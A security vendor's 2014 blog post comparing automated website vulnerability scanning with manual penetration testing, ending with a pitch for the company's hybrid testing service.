In light of COVID-19 precaution measures, we remind that all ImmuniWeb products can be easily configured and safely paid online without any human contact or paperwork.

Total Tests:
This Week:
Today:
Stay in Touch

Weekly newsletter on AI, Application Security & Cybercrime


Your data will stay confidential Private and Confidential

How to keep your website safe in 2015

Wednesday, December 17, 2014 By Read Time: 4 min.

Vulnerability scanning can be very cheap or even free, while penetration testing can be considered quite expensive and time-consuming to plan and execute. However, penetration testing brings significant added-value in comparison to all types of malware or vulnerability scanning currently on the web security market. In this article we will see how businesses can use both types of services in parallel to achieve the highest level of website security.


When security breaches fill the news with stories of stolen customer data and website failures, organisations may turn to automated scanners. However, there's still a common misconception that fully-automated website vulnerability scanning brings the same results as manual web application penetration testing.

The need for human skills was recently demonstrated by a major new analysis (reported by Ars Technica) conducted by the universities of KU Leuven (Belgium) and Stony Brook (New York). The researchers tested websites “protected” with various trust seals provided by security vendors delivering automated vulnerability and malware scanning services – reputable companies including Symantec, McAfee, Trust-Guard, and Qualys. The research showed "that seal providers perform very poorly when it comes to the detection of vulnerabilities on the websites that they certify." This is a weakness inherent in almost all fully-automated solutions – they can only go so far before their output needs to be analysed by a qualified pentester.

Vulnerability Scanning vs Penetration Testing

Vulnerability scanning can be very cheap or even free, while penetration testing can be considered quite expensive and time-consuming to plan and execute. However, penetration testing brings significant added-value in comparison to all types of malware or vulnerability scanning currently on the web security market. In this article we will see how businesses can use both types of services in parallel to achieve the highest level of website security.

In fact, today almost anybody can do vulnerability scanning: you just need to download any of a number of vulnerability scanners – some quite excellent – and run them against a website. They will generate an automatic report providing numerous actual and potential vulnerabilities and weaknesses – and probably a number of false-positives as well. False-positives are time-consuming – you need to verify every single issue the scanner detects. Much worse are false-negatives – existing vulnerabilities that automated solutions miss, leaving systems vulnerable and giving website administrators a false sense of security. Some automated solutions may assign a medium risk to 403 or 500 error pages returned by the web server (that are not vulnerabilities, just error pages). Finally, website administrators, under strain from heavy workloads, start ignoring all medium-risk vulnerabilities from daily scanning reports. As the result they miss important information about real vulnerabilities that deserve their attention.

Security scanners are probably a must-have tool for large companies that perform some of security testing internally, relying on in-house security professionals that are capable of verifying and completing the results of an automated scan. Automated vulnerability scanning can be also very useful to keep internal team up2date about the general state of their web applications. However, automated solutions and security scanners are not capable of replacing a penetration test. They are not suited for SMBs as well, neither for projects where companies need both rapidity and the highest quality of security testing.

True pentesting starts from where a vulnerability scan finishes. A pentester will take the reports from probably several different scans and use his personal skills and experience to weed out the false positives, and identify missed vulnerabilities. In particular, he is likely to recognise the weaknesses in the business logic, which scanners cannot efficiently detect, and see how otherwise minor technical flaws can be chained together to effect a major breach. A recent example of application logic flaw is Alibaba’s website, where a tiny bug exposed the most sensitive information of millions of users. Another recent example is similar vulnerability in Delta airlines website, where URL manipulation permitted to get anyone's boarding pass.

Another example of the vital need for a deep level of IT and security expertise comes with a scanner's discovery of a vulnerability. The vulnerability is probably already known to the security team and remains unpatched for a “good reason” - in some cases a patch for vulnerability may threaten functionality of a critical business process. It is a frequent case in large companies, where many critical products are developed in-house or outsourced, and suffer from various compatibility issues that prevent keeping systems up2date. In this case, scanner will probably just generate generic information about a patching technique. A qualified pentester, however, is capable of understanding the business needs and processes of the customer, and will probably suggest an appropriate solution that will not impact business continuity, and if not fix the vulnerability, then at least prevent its exploitation (by adding additional rule to Web ApplicatFirewall for example).

In our experience, most scanners can probably find only about 40-60% of the vulnerabilities in web applications. It's not a problem with the scanning technology –a scanner could probably be developed for a particular application, platform or framework capable of finding 99% of the vulnerabilities specific to the application. But taking into consideration the great variety of web technologies that exist today, it is impossible to develop a universal scanner that will efficiently detect vulnerabilities in all types of web applications. Human expertise is required here.

However, web penetration tests also have their limits. For example they cannot prevent a website admin PC from being hacked, with the aim to steal a FTP or SSH credentials to infect the website with malware later on. However, a malware can be identified very quickly with daily malware scanning. Vulnerability scanning should be used for continuous security and integrity monitoring, while penetration testing should be used to properly identify all the existing vulnerabilities and weaknesses, and develop reliable fixes for them. This is where continuous daily monitoring combined with quarterly penetration testing is the most efficient and effective way to keep a website secure.

As a solution to the gap between automated and manual security testing, High-Tech Bridge has launched ImmuniWeb® SaaS this year - a hybrid approach to web security testing. ImmuniWeb combines manual and automated web security testing suitable for all types of businesses, regardless their size, geographical location or internal skills. The high speed and large-scale of automated testing combined with human expertise and experience accurately detects the most complex security flaws missed by scanners and other automated solutions. Moreover, ImmuniWeb auditors provide our customers with personalized solutions suited for their business and technical needs.


Ilia N. Kolochenko is the CEO and Founder of ImmuniWeb. Ilia is a member of Forbes Technology Council, and a contributor to CSO Online, SC Magazine UK, Dark Reading and Forbes magazines.

User Comments
Add Comment

Ask a Question